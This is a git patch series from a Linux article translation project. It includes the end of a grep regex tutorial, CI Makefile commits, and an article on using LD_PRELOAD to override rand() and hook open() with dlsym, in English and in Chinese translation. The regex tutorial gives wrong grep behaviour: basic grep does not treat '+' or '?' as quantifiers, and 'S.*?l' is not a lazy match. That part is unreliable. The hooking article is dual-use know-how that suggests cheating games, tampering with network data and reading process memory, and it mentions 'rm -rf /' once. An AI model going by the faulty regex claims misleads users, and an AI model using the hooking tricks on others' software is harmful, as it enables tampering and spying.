that we can use in our regex terms. + +### * (asterisk) + +The following example matches any number of occurrences of the letter k, including none: + + **$ grep "lak*" file4** + +it means we can have a match with 'lake' or 'la' or 'lakkkkk' + +### + + +The following pattern requires that at least one occurrence of the letter k in the string be matched: + + **$ grep "lak+" file5** + +here, k at least should occur once in our search, so our results can be 'lake' or 'lakkkkk' but not 'la'. + + +### **?** + +In the following pattern matches + + **$ grep "ba?b" file6** + +the string bb or bab as with '?' multiplier we can have one or zero occurrence of the character. + +### **Very important Note:** + +This is pretty important while using multipliers, suppose we have a regex + + **$ grep "S.*l" file7** + +And we get results with 'small' , silly & than we also got 'Shane is a little to play ball'. But why did we get 'Shane is a little to play ball', we were only looking to words in our search so why did we get the complete sentence as our output. + +That's because it satisfies our search criteria, it starts with letter 'S', has any number of characters in the middle & ends with letter 'l'. So what can we do to correct our regex, so that we only get words instead of whole sentences as our output. + +We need to add ? Meta character in the regex, + + **$ grep "S.*?l" file7** + +This will correct the behavior of our regex. + +### **\ or Escape characters** + +\ is used when we need to include a character that is a metacharacter or has special meaning to regex. For example, we need to locate all the words ending with dot, so we can use + + **$ grep "S.*\\." file8** + +This will search and match all the words that ends with a dot character. + +We now have some basic idea of how the regex works with this regex basics tutorial. In our next tutorial, we will learn some advance concepts of regex. In meanwhile practice as much as you can, create regex and try to en-corporate them in your work as much as you can. & if having any queries or questions you can leave them in the comments below. + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/ + +作者:[SHUSAIN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/ From 7aa45a881e1fa23af9f31d91918b9134ecd56223 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 11:56:29 +0800 Subject: [PATCH 0576/1627] PRF&PUB:20170413 More Unknown Linux Commands.md @ucasFL https://linux.cn/article-9146-1.html --- .../20170413 More Unknown Linux Commands.md | 34 +++++++++---------- 1 file changed, 16 insertions(+), 18 deletions(-) rename {translated/tech => published}/20170413 More Unknown Linux Commands.md (82%) diff --git a/translated/tech/20170413 More Unknown Linux Commands.md b/published/20170413 More Unknown Linux Commands.md similarity index 82% rename from translated/tech/20170413 More Unknown Linux Commands.md rename to published/20170413 More Unknown Linux Commands.md index 95bad0d983..9d5b905a7a 100644 --- a/translated/tech/20170413 More Unknown Linux Commands.md +++ b/published/20170413 More Unknown Linux Commands.md @@ -1,19 +1,15 @@ 更多你所不知道的 Linux 命令 ============================================================ - ![unknown Linux commands](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/outer-limits-of-linux.jpg?itok=5L5xfj2v "unknown Linux commands") ->在这篇文章中和 Carla Schroder 一起探索 Linux 中的一些鲜为人知的强大工具。[CC Zero][2]Pixabay -本文是一篇关于一些有趣但鲜为人知的工具 `termsaver`、`pv` 和 `calendar` 的文章。`termsaver` 是一个终端 ASCII 锁屏,`pv` 能够测量数据吞吐量并模拟输入。Debian 的 `calendar` 拥有许多不同的日历表,并且你还可以制定你自己的日历表。 +> 在这篇文章中和 Carla Schroder 一起探索 Linux 中的一些鲜为人知的强大工具。 -![Linux commands](https://www.linux.com/sites/lcom/files/styles/floated_images/public/linux-commands-fig-1.png?itok=HveXXLLK "Linux commands") - -*图片 1: 星球大战屏保。[使用许可][1]* +本文是一篇关于一些有趣但鲜为人知的工具 `termsaver`、`pv` 和 `calendar` 的文章。`termsaver` 是一个终端 ASCII 屏保,`pv` 能够测量数据吞吐量并模拟输入。Debian 的 `calendar` 拥有许多不同的日历,并且你还可以制定你自己的日历。 ### 终端屏保 -难道只有图形桌面能够拥有有趣的屏保吗?现在,你可以通过安装 `termsaver` 来享受 ASCII 屏保,比如 matrix(LCTT 译注:电影《黑客帝国》中出现的黑客屏保)、时钟、星球大战以及一系列不太安全的屏保。有趣的屏保将会瞬间占据 NSFW 屏幕。 +难道只有图形桌面能够拥有有趣的屏保吗?现在,你可以通过安装 `termsaver` 来享受 ASCII 屏保,比如 matrix(LCTT 译注:电影《黑客帝国》中出现的黑客屏保)、时钟、星球大战以及两个不太安全not-safe-for-work(NSFW)的屏保。 NSFW 屏保还有很多。 `termsaver` 可以从 Debian/Ubuntu 的包管理器中直接下载安装,如果你使用别的不包含该软件包的发行版比如 CentOS,那么你可以从 [termsaver.brunobraga.net][7] 下载,然后按照安装指导进行安装。 @@ -34,22 +30,22 @@ sysmon displays a graphical system monitor ``` +![Linux commands](https://www.linux.com/sites/lcom/files/styles/floated_images/public/linux-commands-fig-1.png?itok=HveXXLLK "Linux commands") + +*图片 1: 星球大战屏保。* + 你可以通过运行命令 `termsaver [屏保名]` 来使用屏保,比如 `termsaver matrix` ,然后按 `Ctrl+c` 停止。你也可以通过运行 `termsaver [屏保名] -h` 命令来获取关于某一个特定屏保的信息。图片 1 来自 `startwars` 屏保,它运行的是古老但受人喜爱的 [Asciimation Wars][8] 。 -那些不太安全的屏保通过在线获取资源的方式运行,我并不喜欢它们,但好消息是,由于 `termsaver` 是一些 Python 的脚本文件,因此,你可以很容易的利用它们连接到任何你想要的 RSS 资源。 +那些不太安全(NSFW)的屏保通过在线获取资源的方式运行,我并不喜欢它们,但好消息是,由于 `termsaver` 是一些 Python 脚本文件,因此,你可以很容易的利用它们连接到任何你想要的 RSS 资源。 ### pv -`pv` 命令是一个非常有趣的小工具但却很实用。它的用途是监测数据复制的进程,比如,当你运行 `rsync` 命令或创建一个 `tar` 归档的时候。当你不带任何选项运行 `pv` 命令时,默认参数为: +`pv` 命令是一个非常有趣的小工具但却很实用。它的用途是监测数据复制的过程,比如,当你运行 `rsync` 命令或创建一个 `tar` 归档的时候。当你不带任何选项运行 `pv` 命令时,默认参数为: * -p :进程 - * -t :时间,到当前总运行时间 - * -e :预计完成时间,这往往是不准确的,因为 `pv` 通常不知道需要移动的数据的大小 - * -r :速率计数器,或吞吐量 - * -b :字节计数器 一次 `rsync` 传输看起来像这样: @@ -90,11 +86,11 @@ typing random stuff to pipe through pv 普通的 `echo` 命令会瞬间打印一整行内容。通过管道传给 `pv` 之后能够让内容像是重新输入一样的显示出来。我不知道这是否有实际的价值,但是我非常喜欢它。`-L` 选项控制回显的速度,即多少字节每秒。 -`pv` 是一个非常古老且非常有趣的命令,这么多年以来,它拥有了许多的选项,包括有趣的格式化选项,多输出选项,以及传输速度修改器。你可以通过 `man pv` 来查看所有的选项。 +`pv` 是一个非常古老且非常有趣的命令,这么多年以来,它拥有了许多的选项,包括有趣的格式化选项,多种输出选项,以及传输速度修改器。你可以通过 `man pv` 来查看所有的选项。 ### /usr/bin/calendar -通过浏览 `/usr/bin` 目录以及其他命令目录和阅读 man 手册,你能够学到很多东西。在 Debian/Ubuntu 上的 `/usr/bin/calendar` 是 BSD 日历的一个变种,但它忽略了月亮历和太阳历。它保留了多个日历包括 `calendar.computer, calendar.discordian, calendar.music` 以及 `calendar.lotr`。在我的系统上,man 手册列出了 `/usr/bin/calendar` 里存在的不同日历。下面这个例子展示了指环王日历接下来的 60 天: +通过浏览 `/usr/bin` 目录以及其他命令目录和阅读 man 手册,你能够学到很多东西。在 Debian/Ubuntu 上的 `/usr/bin/calendar` 是 BSD 日历的一个变种,但它漏掉了月亮历和太阳历。它保留了多个日历包括 `calendar.computer, calendar.discordian, calendar.music` 以及 `calendar.lotr`。在我的系统上,man 手册列出了 `/usr/bin/calendar` 里存在的不同日历。下面这个例子展示了指环王日历接下来的 60 天: ``` $ calendar -f /usr/share/calendar/calendar.lotr -A 60 @@ -108,15 +104,17 @@ Jun 11 Sauron attacks Osgilliath 又一次很快走到了尽头。你可以花费一些时间来浏览你的文件系统,挖掘更多有趣的命令。 - _你可以他通过来自 Linux 基金会和 edx 的免费课程 ["Introduction to Linux"][5] 来学习更过关于 Linux 的知识_。 + _你可以通过来自 Linux 基金会和 edx 的免费课程 ["Introduction to Linux"][5] 来学习更过关于 Linux 的知识_。 + +(题图:[CC Zero][2] Pixabay) -------------------------------------------------------------------------------- via: https://www.linux.com/learn/intro-to-linux/2017/4/more-unknown-linux-commands -作者:[ CARLA SCHRODER][a] +作者:[CARLA SCHRODER][a] 译者:[ucasFL](https://github.com/ucasFL) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 749ce6ec2c3b75aa06c9e668cc3e7b3ae996a13c Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 20:37:16 -0800 Subject: [PATCH 0577/1627] Add Travis CI Integration --- .travis.yml | 2 ++ Makefile | 40 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 42 insertions(+) create mode 100644 .travis.yml create mode 100644 Makefile diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000000..8fa42f6da6 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,2 @@ +language: ruby +script: make check diff --git a/Makefile b/Makefile new file mode 100644 index 0000000000..b093e6b6ad --- /dev/null +++ b/Makefile @@ -0,0 +1,40 @@ +RULES := rule-source-added \ + rule-translation-requested \ + rule-translation-completed \ + rule-translation-revised \ + rule-translation-published +.PHONY: check match $(RULES) + +CHANGE_FILE := /tmp/changes + +check: $(CHANGE_FILE) + echo 'PR #$(TRAVIS_PULL_REQUEST) Changes:' + cat $(CHANGE_FILE) + echo + echo 'Check for rules...' + make -k $(RULES) 2>/dev/null | grep '^Rule Matched: ' + +$(CHANGE_FILE): + git --no-pager diff '$(TRAVIS_PULL_REQUEST_BRANCH)' FETCH_HEAD --no-renames --name-status > $@ + +rule-source-added: + [[ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ]] + echo 'Rule Matched: $(@)' + +rule-translation-requested: + [[ $(shell grep '^M\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ]] + echo 'Rule Matched: $(@)' + +rule-translation-completed: + [[ $(shell grep '^D\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ]] + [[ $(shell grep '^A\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ]] + echo 'Rule Matched: $(@)' + +rule-translation-revised: + [[ $(shell grep '^M\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ]] + echo 'Rule Matched: $(@)' + +rule-translation-published: + [[ $(shell grep '^D\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ]] + [[ $(shell grep '^A\s\+published/' $(CHANGE_FILE) | wc -l) = 1 ]] + echo 'Rule Matched: $(@)' From 4fab4addd41063753fa0e14ee03b197b1d9336b7 Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 21:03:56 -0800 Subject: [PATCH 0578/1627] Fix CI Environment Variable --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index b093e6b6ad..46b128fe0d 100644 --- a/Makefile +++ b/Makefile @@ -15,7 +15,7 @@ check: $(CHANGE_FILE) make -k $(RULES) 2>/dev/null | grep '^Rule Matched: ' $(CHANGE_FILE): - git --no-pager diff '$(TRAVIS_PULL_REQUEST_BRANCH)' FETCH_HEAD --no-renames --name-status > $@ + git --no-pager diff '$(TRAVIS_BRANCH)' FETCH_HEAD --no-renames --name-status > $@ rule-source-added: [[ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ]] From 008e3f67996934757478b01ff2ec934358834f15 Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 21:10:59 -0800 Subject: [PATCH 0579/1627] Debug CI --- Makefile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index 46b128fe0d..c6b5804a0c 100644 --- a/Makefile +++ b/Makefile @@ -12,10 +12,10 @@ check: $(CHANGE_FILE) cat $(CHANGE_FILE) echo echo 'Check for rules...' - make -k $(RULES) 2>/dev/null | grep '^Rule Matched: ' + make -k $(RULES) | grep '^Rule Matched: ' $(CHANGE_FILE): - git --no-pager diff '$(TRAVIS_BRANCH)' FETCH_HEAD --no-renames --name-status > $@ + git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: [[ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ]] From da2184ef536b0770bf08b9f88f38572e55e83571 Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 21:13:33 -0800 Subject: [PATCH 0580/1627] Fix: Use Single Bracket --- Makefile | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/Makefile b/Makefile index c6b5804a0c..90e178239b 100644 --- a/Makefile +++ b/Makefile @@ -18,23 +18,23 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [[ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ]] + [ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ] echo 'Rule Matched: $(@)' rule-translation-requested: - [[ $(shell grep '^M\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ]] + [ $(shell grep '^M\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: - [[ $(shell grep '^D\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ]] - [[ $(shell grep '^A\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ]] + [ $(shell grep '^D\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-revised: - [[ $(shell grep '^M\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ]] + [ $(shell grep '^M\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: - [[ $(shell grep '^D\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ]] - [[ $(shell grep '^A\s\+published/' $(CHANGE_FILE) | wc -l) = 1 ]] + [ $(shell grep '^D\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+published/' $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' From d0b3f03139b7558aebefbe902c371da071f84a37 Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 21:18:15 -0800 Subject: [PATCH 0581/1627] Clean Up --- .travis.yml | 4 ++-- Makefile | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.travis.yml b/.travis.yml index 8fa42f6da6..1a8cdd6d43 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,2 +1,2 @@ -language: ruby -script: make check +language: c +script: make -s check diff --git a/Makefile b/Makefile index 90e178239b..720c5ee0bc 100644 --- a/Makefile +++ b/Makefile @@ -12,7 +12,7 @@ check: $(CHANGE_FILE) cat $(CHANGE_FILE) echo echo 'Check for rules...' - make -k $(RULES) | grep '^Rule Matched: ' + make -k $(RULES) 2>/dev/null | grep '^Rule Matched: ' $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ From c3a81c223458c8630cd58cf45230f77ae044c366 Mon Sep 17 00:00:00 2001 From: Wenxuan Zhao Date: Thu, 14 Dec 2017 21:29:34 -0800 Subject: [PATCH 0582/1627] Fix Check Logic --- Makefile | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Makefile b/Makefile index 720c5ee0bc..48e9183ea7 100644 --- a/Makefile +++ b/Makefile @@ -19,22 +19,27 @@ $(CHANGE_FILE): rule-source-added: [ $(shell grep '^A\s\+sources/' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell grep -v '^A\s\+sources/' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: [ $(shell grep '^M\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: [ $(shell grep '^D\s\+sources/' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell grep '^A\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' rule-translation-revised: [ $(shell grep '^M\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: [ $(shell grep '^D\s\+translated/' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell grep '^A\s\+published/' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From cf9a53cd62996851be20a17a01aafad50e3cf97a Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 15 Dec 2017 13:52:14 +0800 Subject: [PATCH 0583/1627] Translated by qhwdw --- ...nject features and investigate programs.md | 214 ------------------ ...nject features and investigate programs.md | 212 +++++++++++++++++ 2 files changed, 212 insertions(+), 214 deletions(-) delete mode 100644 sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md create mode 100644 translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md diff --git a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md deleted file mode 100644 index 91029f33da..0000000000 --- a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md +++ /dev/null @@ -1,214 +0,0 @@ -Translating by qhwdw -# Dynamic linker tricks: Using LD_PRELOAD to cheat, inject features and investigate programs - -**This post assumes some basic C skills.** - -Linux puts you in full control. This is not always seen from everyone’s perspective, but a power user loves to be in control. I’m going to show you a basic trick that lets you heavily influence the behavior of most applications, which is not only fun, but also, at times, useful. - -#### A motivational example - -Let us begin with a simple example. Fun first, science later. - - -random_num.c: -``` -#include -#include -#include - -int main(){ - srand(time(NULL)); - int i = 10; - while(i--) printf("%d\n",rand()%100); - return 0; -} -``` - -Simple enough, I believe. I compiled it with no special flags, just - -> ``` -> gcc random_num.c -o random_num -> ``` - -I hope the resulting output is obvious – ten randomly selected numbers 0-99, hopefully different each time you run this program. - -Now let’s pretend we don’t really have the source of this executable. Either delete the source file, or move it somewhere – we won’t need it. We will significantly modify this programs behavior, yet without touching it’s source code nor recompiling it. - -For this, lets create another simple C file: - - -unrandom.c: -``` -int rand(){ - return 42; //the most random number in the universe -} -``` - -We’ll compile it into a shared library. - -> ``` -> gcc -shared -fPIC unrandom.c -o unrandom.so -> ``` - -So what we have now is an application that outputs some random data, and a custom library, which implements the rand() function as a constant value of 42\.  Now… just run  _random_num _ this way, and watch the result: - -> ``` -> LD_PRELOAD=$PWD/unrandom.so ./random_nums -> ``` - -If you are lazy and did not do it yourself (and somehow fail to guess what might have happened), I’ll let you know – the output consists of ten 42’s. - -This may be even more impressive it you first: - -> ``` -> export LD_PRELOAD=$PWD/unrandom.so -> ``` - -and then run the program normally. An unchanged app run in an apparently usual manner seems to be affected by what we did in our tiny library… - -###### **Wait, what? What did just happen?** - -Yup, you are right, our program failed to generate random numbers, because it did not use the “real” rand(), but the one we provided – which returns 42 every time. - -###### **But we *told* it to use the real one. We programmed it to use the real one. Besides, at the time we created that program, the fake rand() did not even exist!** - -This is not entirely true. We did not choose which rand() we want our program to use. We told it just to use rand(). - -When our program is started, certain libraries (that provide functionality needed by the program) are loaded. We can learn which are these using  _ldd_ : - -> ``` -> $ ldd random_nums -> linux-vdso.so.1 => (0x00007fff4bdfe000) -> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) -> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) -> ``` - -What you see as the output is the list of libs that are needed by  _random_nums_ . This list is built into the executable, and is determined compile time. The exact output might slightly differ on your machine, but a **libc.so** must be there – this is the file which provides core C functionality. That includes the “real” rand(). - -We can have a peek at what functions does libc provide. I used the following to get a full list: - -> ``` -> nm -D /lib/libc.so.6 -> ``` - -The  _nm_  command lists symbols found in a binary file. The -D flag tells it to look for dynamic symbols, which makes sense, as libc.so.6 is a dynamic library. The output is very long, but it indeed lists rand() among many other standard functions. - -Now what happens when we set up the environmental variable LD_PRELOAD? This variable **forces some libraries to be loaded for a program**. In our case, it loads  _unrandom.so_  for  _random_num_ , even though the program itself does not ask for it. The following command may be interesting: - -> ``` -> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums -> linux-vdso.so.1 => (0x00007fff369dc000) -> /some/path/to/unrandom.so (0x00007f262b439000) -> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) -> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) -> ``` - -Note that it lists our custom library. And indeed this is the reason why it’s code get’s executed:  _random_num_  calls rand(), but if  _unrandom.so_  is loaded it is our library that provides implementation for rand(). Neat, isn’t it? - -#### Being transparent - -This is not enough. I’d like to be able to inject some code into an application in a similar manner, but in such way that it will be able to function normally. It’s clear if we implemented open() with a simple “ _return 0;_ “, the application we would like to hack should malfunction. The point is to be **transparent**, and to actually call the original open: - -inspect_open.c: -``` -int open(const char *pathname, int flags){ - /* Some evil injected code goes here. */ - return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so -} -``` - -Hm. Not really. This won’t call the “original” open(…). Obviously, this is an endless recursive call. - -How do we access the “real” open function? It is needed to use the programming interface to the dynamic linker. It’s simpler than it sounds. Have a look at this complete example, and then I’ll explain what happens there: - -inspect_open.c: - -``` -#define _GNU_SOURCE -#include - -typedef int (*orig_open_f_type)(const char *pathname, int flags); - -int open(const char *pathname, int flags, ...) -{ - /* Some evil injected code goes here. */ - - orig_open_f_type orig_open; - orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open"); - return orig_open(pathname,flags); -} -``` - -The  _dlfcn.h_  is needed for  _dlsym_  function we use later. That strange  _#define_  directive instructs the compiler to enable some non-standard stuff, we need it to enable  _RTLD_NEXT_  in  _dlfcn.h_ . That typedef is just creating an alias to a complicated pointer-to-function type, with arguments just as the original open – the alias name is  _orig_open_f_type_ , which we’ll use later. - -The body of our custom open(…) consists of some custom code. The last part of it creates a new function pointer  _orig_open_  which will point to the original open(…) function. In order to get the address of that function, we ask  _dlsym_  to find for us the next “open” function on dynamic libraries stack. Finally, we call that function (passing the same arguments as were passed to our fake “open”), and return it’s return value as ours. - -As the “evil injected code” I simply used: - -inspect_open.c (fragment): - -``` -printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h! -``` - -To compile it, I needed to slightly adjust compiler flags: - -> ``` -> gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl -> ``` - -I had to append  _-ldl_ , so that this shared library is linked to  _libdl_ , which provides the  _dlsym_  function. (Nah, I am not going to create a fake version of  _dlsym_ , though this might be fun.) - -So what do I have in result? A shared library, which implements the open(…) function so that it behaves **exactly** as the real open(…)… except it has a side effect of  _printf_ ing the file path :-) - -If you are not convinced this is a powerful trick, it’s the time you tried the following: - -> ``` -> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator -> ``` - -I encourage you to see the result yourself, but basically it lists every file this application accesses. In real time. - -I believe it’s not that hard to imagine why this might be useful for debugging or investigating unknown applications. Please note, however, that this particular trick is not quite complete, because  _open()_  is not the only function that opens files… For example, there is also  _open64()_  in the standard library, and for full investigation you would need to create a fake one too. - -#### **Possible uses** - -If you are still with me and enjoyed the above, let me suggest a bunch of ideas of what can be achieved using this trick. Keep in mind that you can do all the above without to source of the affected app! - -1. ~~Gain root privileges.~~ Not really, don’t even bother, you won’t bypass any security this way. (A quick explanation for pros: no libraries will be preloaded this way if ruid != euid) - -2. Cheat games: **Unrandomize.** This is what I did in the first example. For a fully working case you would need also to implement a custom  _random()_ ,  _rand_r()_ _, random_r()_ . Also some apps may be reading from  _/dev/urandom_  or so, you might redirect them to  _/dev/null_  by running the original  _open()_  with a modified file path. Furthermore, some apps may have their own random number generation algorithm, there is little you can do about that (unless: point 10 below). But this looks like an easy exercise for beginners. - -3. Cheat games: **Bullet time. **Implement all standard time-related functions pretend the time flows two times slower. Or ten times slower. If you correctly calculate new values for time measurement, timed  _sleep_ functions, and others, the affected application will believe the time runs slower (or faster, if you wish), and you can experience awesome bullet-time action. - Or go **even one step further** and let your shared library also be a DBus client, so that you can communicate with it real time. Bind some shortcuts to custom commands, and with some additional calculations in your fake timing functions you will be able to enable&disable the slow-mo or fast-forward anytime you wish. - -4. Investigate apps: **List accessed files.** That’s what my second example does, but this could be also pushed further, by recording and monitoring all app’s file I/O. - -5. Investigate apps: **Monitor internet access.** You might do this with Wireshark or similar software, but with this trick you could actually gain control of what an app sends over the web, and not just look, but also affect the exchanged data. Lots of possibilities here, from detecting spyware, to cheating in multiplayer games, or analyzing & reverse-engineering protocols of closed-source applications. - -6. Investigate apps: **Inspect GTK structures.** Why just limit ourselves to standard library? Let’s inject code in all GTK calls, so that we can learn what widgets does an app use, and how are they structured. This might be then rendered either to an image or even to a gtkbuilder file! Super useful if you want to learn how does some app manage its interface! - -7. **Sandbox unsafe applications.** If you don’t trust some app and are afraid that it may wish to _ rm -rf / _ or do some other unwanted file activities, you might potentially redirect all it’s file IO to e.g. /tmp by appropriately modifying the arguments it passes to all file-related functions (not just  _open_ , but also e.g. removing directories etc.). It’s more difficult trick that a chroot, but it gives you more control. It would be only as safe as complete your “wrapper” was, and unless you really know what you’re doing, don’t actually run any malicious software this way. - -8. **Implement features.** [zlibc][1] is an actual library which is run this precise way; it uncompresses files on the go as they are accessed, so that any application can work on compressed data without even realizing it. - -9. **Fix bugs. **Another real-life example: some time ago (I am not sure this is still the case) Skype – which is closed-source – had problems capturing video from some certain webcams. Because the source could not be modified as Skype is not free software, this was fixed by preloading a library that would correct these problems with video. - -10. Manually **access application’s own memory**. Do note that you can access all app data this way. This may be not impressive if you are familiar with software like CheatEngine/scanmem/GameConqueror, but they all require root privileges to work. LD_PRELOAD does not. In fact, with a number of clever tricks your injected code might access all app memory, because, in fact, it gets executed by that application itself. You might modify everything this application can. You can probably imagine this allows a lot of low-level hacks… but I’ll post an article about it another time. - -These are only the ideas I came up with. I bet you can find some too, if you do – share them by commenting! - --------------------------------------------------------------------------------- - -via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/ - -作者:[Rafał Cieślak ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://rafalcieslak.wordpress.com/ -[1]:http://www.zlibc.linux.lu/index.html - - diff --git a/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md new file mode 100644 index 0000000000..f82e38c3d2 --- /dev/null +++ b/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @@ -0,0 +1,212 @@ +# 动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序 + +**本文假设你具备基本的 C 技能** + +Linux 完全在你的控制之中。从每个人的角度来看似乎并不总是这样,但是一个高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。 + +#### 一个让我们产生兴趣的示例 + +让我们以一个简单的示例开始。先乐趣,后科学。 + + +random_num.c: +``` +#include +#include +#include + +int main(){ + srand(time(NULL)); + int i = 10; + while(i--) printf("%d\n",rand()%100); + return 0; +} +``` + +我相信,它足够简单吧。我不使用任何参数来编译它,如下所示: + +> ``` +> gcc random_num.c -o random_num +> ``` + +我希望它输出的结果是明确的 – 从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。 + +现在,让我们假装真的不知道这个可执行程序的来源。也将它的源文件删除,或者把它移动到别的地方 – 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你不需要接触到它的源代码也不需要重新编译它。 + +因此,让我们来创建另外一个简单的 C 文件: + + +unrandom.c: +``` +int rand(){ + return 42; //the most random number in the universe +} +``` + +我们将编译它进入一个共享库中。 + +> ``` +> gcc -shared -fPIC unrandom.c -o unrandom.so +> ``` + +因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 42 实现一个 rand() 函数。现在 … 就像运行 `random_num` 一样,然后再观察结果: + +> ``` +> LD_PRELOAD=$PWD/unrandom.so ./random_nums +> ``` + +如果你想偷懒或者不想自动亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 – 它输出了十次常数 42。 + +它让你感到非常惊讶吧。 + +> ``` +> export LD_PRELOAD=$PWD/unrandom.so +> ``` + +然后再以正常方式运行这个程序。一个未被改变的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 … + +##### **等等,什么?刚刚发生了什么?** + +是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” 